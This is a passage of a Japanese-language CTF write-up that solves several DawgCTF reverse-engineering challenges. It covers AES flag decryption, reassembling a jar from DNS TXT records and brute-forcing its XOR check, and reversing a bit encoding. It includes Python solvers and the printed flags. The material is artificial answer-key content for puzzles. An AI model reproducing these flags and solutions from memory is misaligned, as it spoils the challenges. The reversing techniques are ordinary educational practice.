(NoSuchPaddingException var14) { var14.printStackTrace(); } try { cipher.init(2, new SecretKeySpec(three, "AES"), new IvParameterSpec(key)); } catch (InvalidKeyException var11) { var11.printStackTrace(); } catch (InvalidAlgorithmParameterException var12) { var12.printStackTrace(); } String decrypted = null; try { decrypted = new String(cipher.doFinal(decodedInput), "UTF-8"); } catch (UnsupportedEncodingException var8) { var8.printStackTrace(); } catch (IllegalBlockSizeException var9) { var9.printStackTrace(); } catch (BadPaddingException var10) { var10.printStackTrace(); } this.setName(decrypted); } } : : }
winnerがtrueになると、scoreは6942069になる。これを元に以下のように算出される。
- three: (score * 10 + 1) ** 4を文字列とし、hexデコードしたもの
- key: (score * 10 + 1) ** 4を文字列とし、逆順にしてhexデコードしたもの
threeを鍵、keyをIVとして暗号データを復号する。
#!/usr/bin/env python3 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad import base64 n = 6942069 x = pow(n * 10 + 1, 4) x_str = str(x) key = bytes.fromhex(x_str) iv = bytes.fromhex(x_str[::-1]) ct = base64.b64decode('6Ach6HiD0JmCc1L+RwxDRzhW3sC1kS6XydgSuWVFpxVXRU8EjfuMxIMoIzMwK/ii') cipher = AES.new(key, AES.MODE_CBC, iv) flag = unpad(cipher.decrypt(ct), 16).decode() print(flag)
DawgCTF{ch3at3R_ch34t3r_pumk1n_34t3r!}
Data Needs Splitting (Reverse Engineering 200)
$ dig TXT data-needs-splitting.umbccd.net ;; Truncated, retrying in TCP mode. ; <<>> DiG 9.20.15-2-Debian <<>> TXT data-needs-splitting.umbccd.net ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14202 ;; flags: qr rd ra; QUERY: 1, ANSWER: 17, AUTHORITY: 2, ADDITIONAL: 13 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1232 ;; QUESTION SECTION: ;data-needs-splitting.umbccd.net. IN TXT ;; ANSWER SECTION: data-needs-splitting.umbccd.net. 300 IN TXT "06UYHy1aggWouAFFCkRWfqMKM+bdMFA2nCpCnqT/EX+IwPZUYHx2d/lHiTIlCpDp1Jdvfs2XvvObnbn7++fgcwjzUVIYQ5FA0RtDEktsSu0C1hb+ovSlvS8BjaZkzb9GYZwqmRdY4oIXlHlKWrgiMcRTud0kW1Kr2qvmFaMl0Wnr/VoeEC4gyKRWyGwVT+JHbRc017MztyCspZFCPL0ckQ/wtVkUCXhovoZujZlN6iNCzhynLOsaueWzM8x2" data-needs-splitting.umbccd.net. 300 IN TXT "09dtPHmtgVyfaEA3fyBVx+i08gXpbuUTosmpz4gkp+t4uBcU5GccolygJwoVcWjopz+JIZql6V5M0TyDJFbRhUViTSJ0iGVEOJY4OEeCI0QyODKHvrhmOEQwx1Os0EGFtp/Tkw/SFn4DUEsHCIasJ7msAgAA7gQAAFBLAwQKAAAIAACttIdcAAAAAAAAAAAAAAAABwAAAGFzc2V0cy9QSwMEFAAICAgAorSHXAAAAAAAAAAAAAAAAA8AAABh" data-needs-splitting.umbccd.net. 300 IN TXT "16hqwnuawCAADuBAAACgAAAAAAAAAAAAAAAAArBAAATWFpbi5jbGFzc1BLAQIKAAoAAAgAAK20h1wAAAAAAAAAAAAAAAAHAAAAAAAAAAAAAAAAAA8HAABhc3NldHMvUEsBAhQAFAAICAgAorSHXGpA5yaAAwAAXAUAAA8AAAAAAAAAAAAAAAAANAcAAGFzc2V0cy9maWxlLmRhdFBLBQYAAAAABgAGAGEBAADxCgAAAAA=" data-needs-splitting.umbccd.net. 300 IN TXT "07WYTL09E+10fFduWKRHP3Uoq+ISejkua7iCqwx9/2UztNvy/QqthW1IhuGmhA23mjIeQVH0MUR3hWWSMdLX0q/hBgYYYqSlIL13Dtkz38Ke8wlqRCAtt3CbY1DDEIYZev9FpM9n2rvONinIpM5Wez5NHCMMnSfwguNYUtgqUhjTMI4JBq3UwNaFVZNB87yJQccdjrsa7mGyqdeKH6uerBDLqVHHdTcSmo7+knzwyA0pKuTjffIx57guVTAQ" data-needs-splitting.umbccd.net. 300 IN TXT "01QAAABQSwMEFAAICAgAw7SHXAAAAAAAAAAAAAAAAAwAAABMb2FkZXIuY2xhc3ONVG1T00AQfq60PQhBEERARBEQ20LF9xeKKK2i1RYcyug4fDqaEyIh6SRXlH/iP/CrfikzOAPfdMZv/h8VN2l5taiZSXazu8/es7t39+3X5haAB3iuIYQGjrCOCKIMnW/EmhizhL00lrGE5+UcYUiXITph2qaaZGiIxV9oaEQTh6ajGTpD2z5mdvGNLCqG" data-needs-splitting.umbccd.net. 300 IN TXT "04+4OEaoHVpE+EbVjSG8o5zkq5lPqT93HA+fWSrBO+kDt6YA9VXkuREZZVMJVMNSJLDc2bnkfgfrd2Ksf7GW3ZrG1LN2iVpMbnaLz/VQPHDMO5v4cGu90PxgU6BCH4TwjMv6boe5X++kgykpHEBtgnUhiu0TcaGBvoex03SPqh3wkWIZlLVMBHKmjJj37Fyc/oeDWyiU5gAz3boxWcnUmwZENyq4KB8fDoF3CyxXrCH2dIb/f1D2geDyd7wh" data-needs-splitting.umbccd.net. 300 IN TXT "14KRu8FFN4IxKpfhXF+19/90NWHQucQkKTPBaMqY9jocct3Lr3jcKedjuTvIWVkQ9b+OgnBPzPfM8o12kq9jKuUKGykiJGaeUYgYIp+k9MI0T2IWLISQtjDhG6NOdgEuMmotS0GDYxBoFxPMIEviXse5zHj3TyZ5ryTfKWRKBLDujPWOTgnLrNOK4Eu0Tlx5jfz2GQiv/gzhBl9WlP+q3/AVBLBwhqQOcmgAMAAFwFAABQSwECCgAKAAAIAA" data-needs-splitting.umbccd.net. 300 IN TXT "11yEhjDHkIZhRF6JVPrywBP7DAO2wxBbPcPDkoogRmSOowwT8TMpiS0VHDFJGmMYPSH1w5NdZjChYRJTVEy96b0c7K5rO0eeFEwzDK84nnBnvKqY2a1Ze4sqLuINjhkNl/Am+T/jIANvyF1NlnEYv1+gR/DeYYaXNbyNdxgUOlJZtR3BEI0nXmdzxF8KU1hf+aIsGp5ddziuMkyd8Deajmfvi2O7igRmpQzXT7TqETerbv2RtVMTlEng4sGL" data-needs-splitting.umbccd.net. 300 IN TXT "08xQMGdcU2jtYqMnjEkdUwg8cMXS0iMPAdf2XZlKJVN1J3z1G/FoRJDCXnlKnueN605VqtUpLuK1GyCFEqwX5P0+c/DsHQUfSEsV0QOwGfY5mqaUHleNZsQQCTpqUPhtzxTGo8jtU/SgLK8Q6xik7NNeSy6VcU8ytO+zwMYJYutP8LgflXmt7ztOqjkdEYGd0H26MJwxN6tzVAxLCAHB3xqQcIEwLkv4G/3kcsP5ZU69AK4+EDJOpI0hCqo2" data-needs-splitting.umbccd.net. 300 IN TXT "15DbtIdcAAAAAAAAAAAAAAAACQAEAAAAAAAAAAAAAAAAAAAATUVUQS1JTkYv/soAAFBLAQIUABQACAgIANu0h1yu61fXUgAAAFQAAAAUAAAAAAAAAAAAAAAAACsAAABNRVRBLUlORi9NQU5JRkVTVC5NRlBLAQIUABQACAgIAMO0h1xYyNp5MgMAAPwFAAAMAAAAAAAAAAAAAAAAAL8AAABMb2FkZXIuY2xhc3NQSwECFAAUAAgICADDtIdc" data-needs-splitting.umbccd.net. 300 IN TXT "13YocfF506odnOp5f3yWEvc51hmCW1bNrlhe3SUJlusVavqw7H2xub8j3E3ZFKrnYZ8kevrdZwiXPKv82ZrVOCSopXrTLYvbttwMHbuck1HpWhZpluUzACanmda7tLtAb0bvwNU22B/0wfAJrYN9kNYNlPpUtkh7jdBfOuDbHQS3nyPUxrk2oqvPMT5yvoULbO1aC2+tPUW42EFi+3ob1/6KYi4fRdIMdGBst5Fe5L6sElNmW8j8ivxsTGlh" data-needs-splitting.umbccd.net. 300 IN TXT "02xiWpAjxDRyyeO5I0peEEWjnadJxEO0PrET+BCD8nPafsFuWUV1CuFKsM8diBTGQ07aVULbnpjGXtUllVQ1McpxjO7AfPlW1lrspH74qypEzHbqfiT+voQjdD16pYkRnHLgr10lTLpHlK2IpYDB+/3kGThg6c8fvXS/2rB6GG9eEcx3kd/bhA1dWhzKCTMKYsK72uJC0ejsUX0hoGMcRxUccwLtEUdsfRbMjXpi1r3arXl4V0Nluv8X2I60" data-needs-splitting.umbccd.net. 300 IN TXT "03j4o44ULceTHKO7hIK4+WXXeSsWLalhBJd1jOEKQ4swjEK5VHKl50mDofvggnsIKpRoZxxD0khzRG+mvLoo3XnfRw6LuDNc/EdPqzxpyYISxZW8KAVwjtsMoYU0x91D+62agEHbm6zHMXGooD0PQ1PBXLKFKrtEJ/Y/PCYSk0RFKwT7cNr0y2iujuCyH0lU0o6jPOWKUl6qZcfwWqPIaHiIRxzT/v56zDC0n9S015wVWVuuuuWmRVE57jrD" data-needs-splitting.umbccd.net. 300 IN TXT "05Ukk9tEp4kOyS16U7iPNMlQwGCA7kefRxM4WkjvpXuyHzr5W4iTTogoblJECpEf6OXo+4kujlscJ3aqt/Egxx3u18cxskPg8J6JDIGVY5wShKnIFO4FnZmkUu8H2gNMkWwkX5reJ3hKfxppz5DHLHp+A1BLBwhYyNp5MgMAAPwFAABQSwMEFAAICAgAw7SHXAAAAAAAAAAAAAAAAAoAAABNYWluLmNsYXNzjVRdU9NAFD3bpmwbgi1FED8Q" data-needs-splitting.umbccd.net. 300 IN TXT "12f8uhYCowMPx7OP6b/oQjxTB+Oo18066ReioM+FRkYXIsaMhh8dUO9rh0V2rC2fOqvbtSkPQbGt4F3Z3BctVyb5Hi/nghsRxA7+l2pdu8hmV8QBSr0RBOhWGaKK/JcZjHkjxxW8OdnoJevW9UUGCo6elMRtdzqZyRzuVypp7LEJJO67k0GZLprKmbEsmkCDEyxFkwDWNBcpKEpLKZZFI3jWRKIhnykybESJoGuUhnskeIbph6Nidr+1jDKt" data-needs-splitting.umbccd.net. 300 IN TXT "10c3NldHMvZmlsZS5kYXRtVEtvG1UU/m5s547H48RN7LyalhQKtds08YwfEycFWoe0GBKnxCFVupvYN/EUZ2wm4xYWCKkCCYkdK0AsKjaVUFnQhS1hqez5SUhgzrXzaNPM4s7c73z3PL5zz/z9358vANzEPRUD8HH4NQQwyBB5YD205muWsze/vvNAlD2GwRu2Y3vvMfjiiS0OhWGsR7Lr8/nm7q5wRWVDWBXhcqgMk0e2gtNoeiXPFdZ+3x" data-needs-splitting.umbccd.net. 300 IN TXT "00UEsDBAoAAAgAANu0h1wAAAAAAAAAAAAAAAAJAAQATUVUQS1JTkYv/soAAFBLAwQUAAgICADbtIdcAAAAAAAAAAAAAAAAFAAAAE1FVEEtSU5GL01BTklGRVNULk1G803My0xLLS7RDUstKs7Mz7NSMNQz4OVyLkpNLElN0XWqtFIwMtAz0DNU0PAvSkzOSVVwzi8qyC9KLAEq1uTl8k3MzNN1zkksLrZSALF5uXi5AFBLBwiu61fXUgAAAF" ;; AUTHORITY SECTION: umbccd.net. 81502 IN NS rayne.ns.cloudflare.com. umbccd.net. 81502 IN NS osmar.ns.cloudflare.com. ;; ADDITIONAL SECTION: osmar.ns.cloudflare.com. 63418 IN AAAA 2a06:98c1:50::ac40:237c osmar.ns.cloudflare.com. 63418 IN AAAA 2606:4700:58::a29f:2c7c osmar.ns.cloudflare.com. 63418 IN AAAA 2803:f800:50::6ca2:c37c rayne.ns.cloudflare.com. 17120 IN AAAA 2a06:98c1:50::ac40:220b rayne.ns.cloudflare.com. 17120 IN AAAA 2606:4700:50::a29f:260b rayne.ns.cloudflare.com. 17120 IN AAAA 2803:f800:50::6ca2:c20b osmar.ns.cloudflare.com. 63418 IN A 162.159.44.124 osmar.ns.cloudflare.com. 63418 IN A 172.64.35.124 osmar.ns.cloudflare.com. 63418 IN A 108.162.195.124 rayne.ns.cloudflare.com. 17120 IN A 108.162.194.11 rayne.ns.cloudflare.com. 17120 IN A 162.159.38.11 rayne.ns.cloudflare.com. 17120 IN A 172.64.34.11 ;; Query time: 32 msec ;; SERVER: 192.168.64.2#53(192.168.64.2) (TCP) ;; WHEN: Sun Apr 12 18:38:47 JST 2026 ;; MSG SIZE rcvd: 4872
TXTレコードに関係しそうなデータが設定されている。先頭2バイトは順序を示すデータで、以降はbase64文字列になっていると推測できるので、順に連結しデコードする。
#!/usr/bin/env python3 from base64 import * encs = [ '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' ] b64_exe = '' for i in range(len(encs)): for j in range(len(encs)): if int(encs[j][:2]) == i: b64_exe += encs[j][2:] break bin_data = b64decode(b64_exe) with open('chall.jar', 'wb') as f: f.write(bin_data)
jarファイルになったので、jadx-guiでデコンパイルする。
package defpackage; /* renamed from: Main reason: default package */ /* loaded from: chall.jar:Main.class */ public class Main { public static void main(String[] strArr) throws Exception { Class<?> load = new Loader().load("/assets/file.dat"); System.out.println(((Boolean) load.getMethod("validate", new Class[0]).invoke(load.getDeclaredConstructor(new Class[0]).newInstance(new Object[0]), new Object[0])).booleanValue() ? "Correct!" : "Incorrect!"); } } package defpackage; import java.io.InputStream; /* renamed from: Loader reason: default package */ /* loaded from: chall.jar:Loader.class */ public class Loader extends ClassLoader { public Class<?> load(String str) throws Exception { InputStream resourceAsStream = getClass().getResourceAsStream(str); try { if (resourceAsStream == null) { throw new RuntimeException("Missing resource: " + str); } byte[] readAllBytes = resourceAsStream.readAllBytes(); Class<?> defineClass = defineClass(null, readAllBytes, 0, readAllBytes.length); if (resourceAsStream != null) { resourceAsStream.close(); } return defineClass; } catch (Throwable th) { if (resourceAsStream != null) { try { resourceAsStream.close(); } catch (Throwable th2) { th.addSuppressed(th2); } } throw th; } } } package defpackage; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; /* renamed from: Validator reason: default package */ /* loaded from: chall.jar:assets/file.dat */ public class Validator { public boolean validate() { BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(System.in)); System.out.println("Enter the flag:"); try { String readLine = bufferedReader.readLine(); StringBuilder sb = new StringBuilder(); for (int i = 0; i < readLine.length(); i++) { sb.append((readLine.charAt(i) ^ ((char) ((2194307438957234483 >>> ((i % 4) * 16)) & 65535))) ^ ((char) ((148527584754938272 >>> ((i % 4) * 16)) & 65535))); } if (sb.toString().equals("145511939249997195145441944550467175145531942549987228145401943650017203145451934650207244145651934650127169")) { return true; } return false; } catch (IOException e) { throw new RuntimeException(e); } } }
フラグ文字列を1文字ずつ、特定の鍵とのXORした結果の数値を文字列として結合したものが以下のようになる。
145511939249997195145441944550467175145531942549987228145401943650017203145451934650207244145651934650127169
1文字に対する暗号データの桁数がわからないので、1文字ずつ総当たりで部分文字列が一致するものを探す。
#!/usr/bin/env python3 target = '145511939249997195145441944550467175145531942549987228145401943650017203145451934650207244145651934650127169' k1 = 2194307438957234483 k2 = 148527584754938272 flag = '' i = 0 target_index = 0 while len(target) != target_index: key1 = (k1 >> ((i % 4) * 16)) & 65535 key2 = (k2 >> ((i % 4) * 16)) & 65535 for code in range(33, 127): val = str(code ^ key1 ^ key2) l = len(val) if target[target_index:target_index + l] == val: flag += chr(code) i += 1 target_index += l break print(flag)
DawgCTF{J@v@_My_B3l0v3d}
Dust to Dust (Reverse Engineering 250)
このコードの処理概要は以下の通り。
・input.txtの2行×3文字ずつをブロックとして、以下の処理を行う。 ・1行目の3文字と2行目の3文字で、6ビットの数値とする。 ・この数値に32をプラスし、ASCIIコードとして文字にする。 ・2行をセットとして、行末に"}"を追加 ・最後に"~"を追加
これを逆算してinput.txtの内容を復元する。
#!/usr/bin/env python3 with open('output.txt', 'r') as f: encs = f.read().rstrip('~').split('}') input = [''] * (len(encs) * 2) for i in range(len(encs)): for c in encs[i]: b = bin(ord(c) - 32)[2:].zfill(6) input[i * 2] += b[:3] input[i * 2 + 1] += b[3:] with open('input.txt', 'w') as f: f.write('\n'.join(input))
復元したinput.txtの内容を見てみる。
$ cat input.txt 111111111111111101110111101001110111111111111111111101111110111111111111111111111111011110101111101010111010111111111111111111111111111111111111011111111111111111111111111111111111011101111111111111 111111111111111111011101110111011101111111111111111111111101011111011111111111111101111101011111010011111110111111010111111111111111111111111101011111111111111111101111011001100110110111011111111111 111111111111111111110111111101110111111111111111111111111110111111111110111111111111111010101110101111111010111100101111111111111111111111111111111111111111111111111111111111111111111101110111111111 111101111111011111111101111111011101111111111111111111010101110111111101110111010101110101011101000110011101100110011111111111111111111111110111110110011111110111110111111111111111011110011011111101 111111111111011111110111011101110111111111111111111110111111101111111011111110111111101110101011101110111110101110001011111111111111111111101011111111111111011111111111111111111111111111111111111111 111111111101110111111101110111111101011101011111111101111111011011110111111101111111011111010010011101111100011001001111111111111111111101010110011001101101110111111111111111111111111111100110011111 111111110111011101111111011101110110111010101111111111101111111011111111111111101111101010000110101011111110111011111110111111111111111010110111111111110111011111111111111111111111111111111111111111 011111111101111111011101110111111101011101011101111111011111100111111001111111011111010111110001111100010001100100111001010111110111110111011001100110011101110101111111011111010001111101111001111111 111111110111011101111111011101111010101110101011101010101010101110101011101010101010101010101010101010101010101110101011111010111111111111110111111111111110101111111111111010101011111111111111111111 111111111101111111011101110111111100010011001100111101010101011101010111010101010101011101010101010101010100011001000110110001111111011111011110011001110101011101010111111101110110011111111110011111 111111111111111111101111011101101010101011101110101111101011101110111110101010101010111010101010101010100000000000000010111011111110111010101111111111111010111010101110101011101011111111111111111111 111101011101010101010101010101110101000100110111110101110111011101110101010111010101110101010101010101010001100000000000011110111101110101011101100110011101110100011101010111000001111111110001111101 111111111111101011111110101010111110101011111011111101001111000011110000111100011111000011110000111100000000000011000000111011111010101110101011111111111010101110001011100000111010111111111111111111 110111111111010111110101110001011101000011111110111110001111000000000000011100101111000011110001111100000000000000000000110111111100011001000110011001100100011001000110010001100100111111111110011111 111011111111101011101000111010111010100011110000111100000000000000000000000000000000000000000011110000000000000000000000111111110010111010101110111111111010111000101110101001101010111111111111111111 010101111111000111010001001100010111000111110000111110000000000000000000000000000000000000000111110000000000000000000000011111110001100100011001000110010001100100011001000110010001111101111001111111 111010111010101010101010101111101010101010101011100000010011100000001111111110000000000000000111110000111111100000001000000000001010101110101011101010111010101110101001100000011010101111110000111111 111101111100010001000100010001000111010101010110010000001111110000111111111110011111111000000111100000111111111110001000000001100100011001000110010001100100011001000000000000100100011001010000011111 111010110000000000101010101010101011101010010100000000011100111001000001100000011111111000000111100000111111111110010000000011100010111010101110101011101010111000000000001110000010111010100111101111 111101010000000000010001000100100001000100111000000000111000111000000001100000011111111000000111100000000001000000010000000111100000000100010001000100010001000100000000011110000001100101011011010101 111010000001111110000010000001000000010001000000000001111000011000000001100000111000000000000111100000000011000000010000011111000000000010101010101010101010101000000000011110000010001111111000110111 110000000111111111000000000010001000100010000000000001111000000000000001100000110000000000000111100000000011000000100000000010100000000001000100010001000100010000000000110110000100011011110000110101 111001001111000011110000000000000000000000000000000001111000000000000001100000110000000000000111100000000011000000110000000110100000000000001000000000000010101000000001110111000010101011111100001111 011110001111000001111000000000000000000000000000000001111000000000000001100000110000000000000111100000000111000000110000000110100000000000000001000000000000000000000001100011000000000111110001100111 111000001111000000011000000000000000000000000000011001111000000000000011100000111111111000001111100000001110000001110000000110000001111000000000100000000000000000000011100011000000000010111011101111 111101110111000000011100000000000000000000001100011101111000000000000011100001111111111000111111100000001100000001100000000111000011111110000000000000100000000000000111000111000000000001010101011001 111001100111100000001110000000000000000000011100100100111000000000000011100001101111111000111111100000001100000011110000000111000011111101000010000000000000000000000110011100000000000000101011101111 011110010111101000001110000000000001000000011000110110111100000111000011100001100000000000000111100000001100000011001000001111000011000000000000000001111000000000001111111111110001110000010111010111 111001111011100001001110000011100001000110011001110110111110000111000000000001100000000000000111100000001100000111001000001111000000111100000000100000111000110000101111111101111011111100000000111111 111010100111100010011110111100110000100111011001110110011111001111000011100000000000000000000111100000010000000110001000001110000000111110000000000000011001110001000000111111111011011110000000111101 101101001011100000011110111000111000101111011000110110010001111111000001100001100000000000000111100000011000000110001000001110000000000111000000000000011001110011000000001110000111000110000100111111 010110000001100000011101111000011000011111111000111110001110001110000000000001000000100000000111100000011000001110010000000000000001100111000000000000001011110011000000001100000111110000000101111110 111000011011100000111101111000011000011101110000000110000111110000000000000000000000000000000111110000000000001100010001111111110001111111000000000000001011111110000000001110000011111000000001101111 011100100101110000111101110000111100001000110000000110000011110000000000000000000000000000000111110000000000001100010001111111110000111110000001111100001100011110000000001110000000011100000000001101 111011001010110001111001110000111110000000000000000110000000000000000000000000000000000100000111111100000000000000000000000000000000000000011111111100001100011100000000001110000000011100000000000111 110110000000110111111001111111111111000000000000001110000000000000011011000000000000100000000111111100000000000000000000000000000000000001011111111110000000011000000000010110000110011000000000000110 111010011010111111110001111111101111000000000000001100000000000001000000010000000000000011000111111100100000000000000000010000000000000000000000000010000000000000000000011000000111111000001111111111 111001100100000000100000000000000111000000000011101000000100100010000000000000001100000011000000001011000000000000010000001100000000000000000000000000100000000000000000011100000011110001111111111001 111011000010111110000000111100000000000000000011110000000010000000000000000001000000010000000000000110000000000001100000000010001111000010000000000000000000000000000000000000000000000001111000000111 011110000001111000000000000000000000000000000001111000000001100000000000000000000000010110000000000000000000000010001100100001011001000000000000100000000000000000010000000000000000000000000000000110 111010111000010000000000000000000000000000000000111000000000000000000000000000000000000110000000000000000000000110000001101100011011000100000001000000000000000010101010101010101010100010101010000111 111001100100010000000000000001100000000000000000000000000100001000111111000000000000000000000000000000000011000100110000011100000101000000110000000000000000010001000100010001000100010001000100001001 111011101010001000010001000001110000000100000001000000010010010001111111110000100000000000000000000000000000000000000000001000110000000000000000000000000000101011101010101010101010101010101010111111 111110010001100000000010000011110000001000100010001000100001100000000111110000010001000011111110000000100000000000000000000000000000000000000000000000000001000100110111000100010001000100010001001110 111100111010001110000000001111110000010000000100010001000000000000000110000000001100000111111111000000000000000000000000011110000100000000001110100000000010101010101111111111111110101010101010111111 